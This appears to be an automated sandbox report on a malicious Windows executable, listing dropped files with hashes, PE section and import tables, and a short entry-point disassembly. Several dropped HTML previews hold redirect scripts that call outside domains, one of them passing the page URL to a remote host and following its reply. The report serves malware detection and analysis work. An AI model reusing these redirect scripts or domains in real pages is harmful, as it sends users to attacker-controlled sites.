                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJxz6v46YcD8SUDsgmfWXpr+89b4bWsfwv+jm:R6lXJ16Q6YLSUDsgmfW94b1f16
                                                                                                                                                                                                          MD5:65FEBFA355FE567292722349CBBC36EA
                                                                                                                                                                                                          SHA1:C3CCE7122FD437EF657187E6E477C22EAD656DB4
                                                                                                                                                                                                          SHA-256:974F04B9607598F47056AC96B1EF84854D50AC3E967A71963F0DA1656A328A3E
                                                                                                                                                                                                          SHA-512:F2B74C45FCB8A2B51FFF925126B11477365FD6011BD8164E457A6FE0A80F9119C26A114545E7FA55CA3E07F0A97604A62C64A6DB96E202E81F9F6917C3C1E06B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.7.6.<./.P.i.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4629
                                                                                                                                                                                                          Entropy (8bit):4.511632919910938
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI90/WpW8VYMFYm8M4JYLBF0+q8x73gGZW8ed:uIjfWI7Gu7VGJQII3gX8ed
                                                                                                                                                                                                          MD5:3A87B4118D13D74FFA409BF497A9F005
                                                                                                                                                                                                          SHA1:727E6571A5868D931D76C1E687B74E99DD193A01
                                                                                                                                                                                                          SHA-256:65B132D8D4061BAA1BA142014E423DFCC47678EF69186F46E29B145345E575BC
                                                                                                                                                                                                          SHA-512:FE2544FBC359D6F9DC16A9FD7EC3025B2D233440B44B85A934926D232BC36F3BA3B7B29DFD7BE76BB74D63D6561969A0503B5D60184FF234983B629C2E853E7E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="491035" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):173
                                                                                                                                                                                                          Entropy (8bit):4.43096450882803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                          MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                          SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                          SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                          SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                                          Entropy (8bit):4.43530643106624
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                          MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                          SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                          SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                          SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):173
                                                                                                                                                                                                          Entropy (8bit):4.43096450882803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                          MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                          SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                          SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                          SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):4.470551863591405
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                          MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                          SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                          SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                          SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):4.470551863591405
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                          MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                          SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                          SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                          SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):4.802925647778009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                          MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                          SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                          SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                          SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (481), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):481
                                                                                                                                                                                                          Entropy (8bit):5.818218214704804
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:kxvsCk9cE3MxlVT/XAUoJ8mhL+WWRACUYI:kbxxlVT/wcQ+Hd/I
                                                                                                                                                                                                          MD5:B61A8DC8A1A7E5D4A3966C078E9E4FE5
                                                                                                                                                                                                          SHA1:90E302E6FE4B4CCA46378B32EF58DD9EDB3A4DE3
                                                                                                                                                                                                          SHA-256:D0A6126A8EE21290C3E206B7DF9D8A157EBBB7E0AA9FC375FD59367BED1645A7
                                                                                                                                                                                                          SHA-512:363EE3AF0A37856D9BD7AECA572848D114887CD0B0A0BD9D18A7E0DB71F0B46CFDEB24E359AA791142963892A04A5A4E08F950A022204F3805E5A38104138EF5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc5MjgzMiwiaWF0IjoxNzI1Nzg1NjMyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqaG90ZDgwOTQxZ2JhaDQxZGl0ZTkiLCJuYmYiOjE3MjU3ODU2MzIsInRzIjoxNzI1Nzg1NjMyNzI4MzYwfQ.LG1EzBfX1ECbJXMCgcf9aj9iS9_3pAa-hmXKPDIsKPc&sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795');</script></body></html>
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\OjKmJJm2YT.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):216576
                                                                                                                                                                                                          Entropy (8bit):7.848215673191657
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:2rMoyX6dxajoPXA1nriwrw1cfCOSJcAb:kysxVY1nZ+b
                                                                                                                                                                                                          MD5:3AFDB594A34F95485CA05A57DFEF80CC
                                                                                                                                                                                                          SHA1:173F90C656015AEF5F07E318E352B10DAEE1A8D3
                                                                                                                                                                                                          SHA-256:9BDEB7AA43A7254463FBB28E70E1D5348E5A80445A605192FA519B2163919539
                                                                                                                                                                                                          SHA-512:95890421ED70442389154FF6DDA2E69B4E82F28AE57ABB08DD0F1CB44FE1A93E83AD3FB1BD361B9BEB5DF305E155463A41ED139C35B8D19245DDD7FF79BFB9DC
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.8?.................,......*.................@.......................... ......A.{=.............................................`..x...........................@&...............................................................................text....+.......,.................. ..`.D.......S...@.......0..............@....SC.....g............4..............@....Wp...... ...........<..............@..@.aS..................>..............@....vtzr....w...........B..............@..@.fvH....-.... .......R..............@..@.data....@.......B...Z..............@....Lx......@..........................@....sOZF...s(...P......................@....h..................................@....rsrc...x....`......................@..@.reloc...............J..............@..B........................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\OjKmJJm2YT.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):7.848215355979006
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:OjKmJJm2YT.exe
                                                                                                                                                                                                          File size:216'576 bytes
                                                                                                                                                                                                          MD5:ca30350fdb8b854abac0a08aa08ff89a
                                                                                                                                                                                                          SHA1:1204292ab1abc758ebfb9bf6d452b960eb6d977a
                                                                                                                                                                                                          SHA256:b1242f3aa475d93a247673616478365f3a7f9fb1edbe8075372a09455521a57d
                                                                                                                                                                                                          SHA512:3c7b4da948a5dcb4d3d8a01e844218fed339529fba7b90ee69c6a0cc5a35053474ae39cf6ddb18ae8ff14c6988e989b5eb15352f007e33a1825a0e3fcf374b79
                                                                                                                                                                                                          SSDEEP:6144:/rMoyX6dxajoPXA1nriwrw1cfCOSJcAb:HysxVY1nZ+b
                                                                                                                                                                                                          TLSH:EB240293F38A29E7C2200D3F12F7230711B74A615375C59BE641A66D3AD65C8BCE2A37
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.8?.................,......*.................@.......................... .......<S)...................................
                                                                                                                                                                                                          Icon Hash:000a35b5b5b5b555
                                                                                                                                                                                                          Entrypoint:0x401b81
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                          Time Stamp:0x3F38BB49 [Tue Aug 12 10:02:49 2003 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                          Import Hash:1c6c3b0bd56b7f130f1f283a88a358b9
                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          mov dword ptr [0042C4BBh], 00000000h
                                                                                                                                                                                                          mov eax, dword ptr [0042C4BBh]
                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          mov edx, 00000000h
                                                                                                                                                                                                          push edx
                                                                                                                                                                                                          call dword ptr [0041A0E8h]
                                                                                                                                                                                                          mov dword ptr [0042B3DBh], eax
                                                                                                                                                                                                          mov dword ptr [0042BE8Ah], 00000000h
                                                                                                                                                                                                          mov eax, dword ptr [0042BE8Ah]
                                                                                                                                                                                                          push 00000CD8h
                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                          sub dword ptr [0042B515h], ecx
                                                                                                                                                                                                          sub ecx, 00000B04h
                                                                                                                                                                                                          add ecx, 00000FC4h
                                                                                                                                                                                                          jc 00007FA49C4FA128h
                                                                                                                                                                                                          sub dword ptr [0042C68Fh], ecx
                                                                                                                                                                                                          sub dword ptr [0042BB7Fh], ecx
                                                                                                                                                                                                          shl ecx, 1
                                                                                                                                                                                                          ror ecx, 1
                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                          shr ecx, 03h
                                                                                                                                                                                                          add ecx, 0000020Ah
                                                                                                                                                                                                          jbe 00007FA49C4FA124h
                                                                                                                                                                                                          ror ecx, 1
                                                                                                                                                                                                          sub ecx, 0000063Ch
                                                                                                                                                                                                          add dword ptr [0042BBF3h], ecx
                                                                                                                                                                                                          call 00007FA49C4FB1E1h
                                                                                                                                                                                                          mov dword ptr [0042B16Ch], eax
                                                                                                                                                                                                          mov esi, 00000070h
                                                                                                                                                                                                          push esi
                                                                                                                                                                                                          mov ebx, 003B993Ch
                                                                                                                                                                                                          add ebx, 0004794Ch
                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                          mov ebx, 0088689Fh
                                                                                                                                                                                                          mov ecx, ebx
                                                                                                                                                                                                          sub ecx, 0046C7EFh
                                                                                                                                                                                                          call dword ptr [ecx]
                                                                                                                                                                                                          mov eax, 000B3EA0h
                                                                                                                                                                                                          mov ebp, eax
                                                                                                                                                                                                          mov ebx, 003784B2h
                                                                                                                                                                                                          add ebp, ebx
                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                          mov dword ptr [0042BD80h], 00000000h
                                                                                                                                                                                                          mov ebx, dword ptr [0042BD80h]
                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1a21c0xc8.vtzr
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x2a078.rsrc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x910000x3ac.reloc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x226400x1c.fvH
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                          .text0x10000x2b130x2c00a4d3b0ce94ad84ed9b2c4a969cc56c70False0.7213245738636364data6.3708778153510535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .D0x40000x53950x4000a4832bacfca532f98f82bc1cc110244False0.69921875data5.273643553772029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .SC0xa0000x1b670x800bb8ff8817aa8b7520a20564fd256b92fFalse0.7783203125data6.022115319944559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .Wp0xc0000x20180x2009611c8690e8bf17b251ef8b541ed1e18False0.123046875data0.6947806982136152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .aS0xf0000xa4140x400d5ffc696fc4b630af8e12dfa1574f79cFalse0.765625data6.148168693021462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .vtzr0x1a0000x77dc0x10004f89745b1d45e480b7f984a37b2ca7cbFalse0.421630859375data4.955037110529063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .fvH0x220000x812d0x800c13d406df81dfb9974deaa5e7f3abd5cFalse0.66162109375data5.533722089361082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .data0x2b0000x40e10x42001198ccdd255c02df07ec9c1fcfac9f40False0.8023200757575758data6.722929764502196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .Lx0x300000x40f80x20046a7c2a4a48f130efa5331a91bf9e031False0.8359375data6.270861660546221IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .sOZF0x350000x28730x200f4b90d55380f914fc23bd3ebea3c4353False0.14453125data0.9511370466044033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .h0x380000x2dd8e0x800d7507f29fab95163821d691fdda39111False0.59033203125data4.8672358493330465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .rsrc0x660000x2a0780x2a2007ab61db470df553ddeddd538afefbc71False0.9833433790801187data7.982188426455354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .reloc0x910000x3ac0x400d66b97b3d918ce38ba35c65e93106bb1False0.8583984375data6.404465099324306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                          RT_ICON0x661780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4160412757973734
                                                                                                                                                                                                          RT_DIALOG0x672200x4cdataEnglishUnited States0.9210526315789473
                                                                                                                                                                                                          RT_RCDATA0x6726c0x28b94dataEnglishUnited States1.0003656986643006
                                                                                                                                                                                                          RT_GROUP_ICON0x8fe000x14dataEnglishUnited States1.1
                                                                                                                                                                                                          RT_VERSION0x8fe140x264dataEnglishUnited States0.5179738562091504
                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                          KERNEL32.DLLCreateDirectoryW, GetStartupInfoW, OpenWaitableTimerW, BeginUpdateResourceA, OpenEventA, DeleteAtom, CreateMailslotW, ReplaceFileA, CompareFileTime, ReadFile, GetCalendarInfoW, SetLocaleInfoA, GetLogicalDriveStringsA, GetLastError, SetPriorityClass, GetUserDefaultLangID, SearchPathA, GetTimeFormatW, GetModuleHandleA, lstrcpy, CreateFileA, QueryPerformanceCounter, EnumDateFormatsA, ReadDirectoryChangesW, GetMailslotInfo, GetProcAddress, GlobalFindAtomW, RaiseException, EnumTimeFormatsA, GetComputerNameA, FreeLibrary, GetFullPathNameW, OpenEventW, SetComputerNameW, GetLongPathNameW, GetNamedPipeInfo, GetHandleInformation, GetExpandedNameA, SetEvent
